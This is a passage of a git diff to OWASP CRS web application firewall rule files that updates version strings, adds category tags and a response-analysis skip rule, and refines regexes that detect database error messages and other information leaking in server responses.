     SecRule TX:EARLY_BLOCKING "@eq 1"
 
@@ -230,34 +230,34 @@ SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_thresh
     msg:'Inbound Anomaly Score Exceeded (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\
     tag:'anomaly-evaluation',\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0'"
+    ver:'OWASP_CRS/4.15.0-dev'"
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/RESPONSE-950-DATA-LEAKAGES.conf b/rules/RESPONSE-950-DATA-LEAKAGES.conf
index 4a481dff1..c6b566a2e 100644
--- a/rules/RESPONSE-950-DATA-LEAKAGES.conf
+++ b/rules/RESPONSE-950-DATA-LEAKAGES.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -21,6 +21,17 @@
 # -= Paranoia Level 0 (empty) =- (apply unconditionally)
 #
 
+# Skip all rules if TX:crs_skip_response_analysis is set.
+SecRule TX:crs_skip_response_analysis "@eq 1" \
+    "id:950021,\
+    phase:3,\
+    pass,\
+    nolog,\
+    tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES',\
+    ver:'OWASP_CRS/4.15.0-dev',\
+    skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
+
 # Skip all rules if RESPONSE_BODY is compressed.
 SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \
     "id:950010,\
@@ -28,11 +39,12 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    tag:'OWASP_CRS/DATA-LEAKAGES',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:950012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -54,9 +66,10 @@ SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?<H|title>Index of.*?<h)1>Inde
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES',\
     tag:'capec/1000/118/116/54/127',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 
@@ -86,15 +99,16 @@ SecRule RESPONSE_BODY "@rx ^#\!\s?/" \
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -116,24 +130,25 @@ SecRule RESPONSE_STATUS "@rx ^5\d{2}$" \
     tag:'attack-disclosure',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES',\
     tag:'capec/1000/152',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}'"
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:950016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:950018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf b/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf
index 54e427893..b3bd6f05d 100644
--- a/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf
+++ b/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -19,11 +19,12 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \
     pass,\
     nolog,\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:951012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -45,8 +46,9 @@ SecRule RESPONSE_BODY "!@pmFromFile sql-errors.data" \
     tag:'platform-multi',\
     tag:'attack-disclosure',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     skipAfter:END-SQL-ERROR-MATCH-PL1"
 
 SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Microsoft\]\[ODBC Microsoft Access Driver\])" \
@@ -63,8 +65,9 @@ SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Micr
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -88,8 +91,9 @@ SecRule RESPONSE_BODY "@rx (?i)\bORA-[0-9][0-9][0-9][0-9][0-9]:|java\.sql\.SQLEx
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -108,8 +112,9 @@ SecRule RESPONSE_BODY "@rx (?i:DB2 SQL error:|\[IBM\]\[CLI Driver\]\[DB2/6000\]|
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -128,8 +133,9 @@ SecRule RESPONSE_BODY "@rx (?i:\[DM_QUERY_E_SYNTAX\]|has occurred in the vicinit
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -148,8 +154,9 @@ SecRule RESPONSE_BODY "@rx (?i)Dynamic SQL Error" \
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -168,8 +175,9 @@ SecRule RESPONSE_BODY "@rx (?i)Exception (?:condition )?\d+\. Transaction rollba
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -188,8 +196,9 @@ SecRule RESPONSE_BODY "@rx (?i)org\.hsqldb\.jdbc" \
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -208,8 +217,9 @@ SecRule RESPONSE_BODY "@rx (?i:An illegal character has been found in the statem
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -228,8 +238,9 @@ SecRule RESPONSE_BODY "@rx (?i:Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -248,8 +259,9 @@ SecRule RESPONSE_BODY "@rx (?i:<b>Warning</b>: ibase_|Unexpected end of command
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -268,13 +280,14 @@ SecRule RESPONSE_BODY "@rx (?i:SQL error.*POS[0-9]+.*|Warning.*maxdb.*)" \
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
 
-SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsoft\]\[ODBC SQL Server Driver\]|\[Macromedia\]\[SQLServer JDBC Driver\]|\[SqlException|System\.Data\.SqlClient\.SqlException|Unclosed quotation mark after the character string|'80040e14'|mssql_query\(\)|Microsoft OLE DB Provider for ODBC Drivers|Microsoft OLE DB Provider for SQL Server|Incorrect syntax near|Sintaxis incorrecta cerca de|Syntax error in string in query expression|Procedure or function .* expects parameter|Unclosed quotation mark before the character string|Syntax error .* in query expression|Data type mismatch in criteria expression\.|ADODB\.Field \(0x800A0BCD\)|the used select statements have different number of columns|OLE DB.*SQL Server|Warning.*mssql_.*|Driver.*SQL[ _-]*Server|SQL Server.*Driver|SQL Server.*[0-9a-fA-F]{8}|Exception.*\WSystem\.Data\.SqlClient\.|Conversion failed when converting the varchar value .*? to data type int\.)" \
+SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsoft\]\[ODBC SQL Server Driver\]|\[Macromedia\]\[SQLServer JDBC Driver\]|\[SqlException|System\.Data\.SqlClient\.SqlException|Unclosed quotation mark after the character string|'80040e14'|mssql_query\(\)|Microsoft OLE DB Provider for ODBC Drivers|Microsoft OLE DB Provider for SQL Server|Incorrect syntax near|Sintaxis incorrecta cerca de|Syntax error in string in query expression|Procedure or function '.{1,128}' expects parameter|Unclosed quotation mark before the character string|Syntax error .* in query expression|Data type mismatch in criteria expression\.|ADODB\.Field \(0x800A0BCD\)|the used select statements have different number of columns|OLE DB.*SQL Server|Warning.*mssql_.*|Driver.*SQL[ _-]*Server|Exception.*\WSystem\.Data\.SqlClient\.|Conversion failed when converting the varchar value .*? to data type int\.)" \
     "id:951220,\
     phase:4,\
     block,\
@@ -288,8 +301,9 @@ SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsof
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -313,8 +327,9 @@ SecRule RESPONSE_BODY "@rx (?i)(?:supplied argument is not a valid |SQL syntax.*
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -338,8 +353,9 @@ SecRule RESPONSE_BODY "@rx (?i)P(?:ostgreSQL(?: query failed:|.{1,20}ERROR)|G::[
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -358,8 +374,9 @@ SecRule RESPONSE_BODY "@rx (?i)(?:Warning.*sqlite_.*|Warning.*SQLite3::|SQLite/J
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -378,8 +395,9 @@ SecRule RESPONSE_BODY "@rx (?i)(?:Sybase message:|Warning.{2,20}sybase|Sybase.*S
     tag:'attack-disclosure',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/DATA-LEAKAGES-SQL',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -387,24 +405,24 @@ SecRule RESPONSE_BODY "@rx (?i)(?:Sybase message:|Warning.{2,20}sybase|Sybase.*S
 SecMarker "END-SQL-ERROR-MATCH-PL1"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951013,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951014,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951015,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951016,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951017,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951018,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
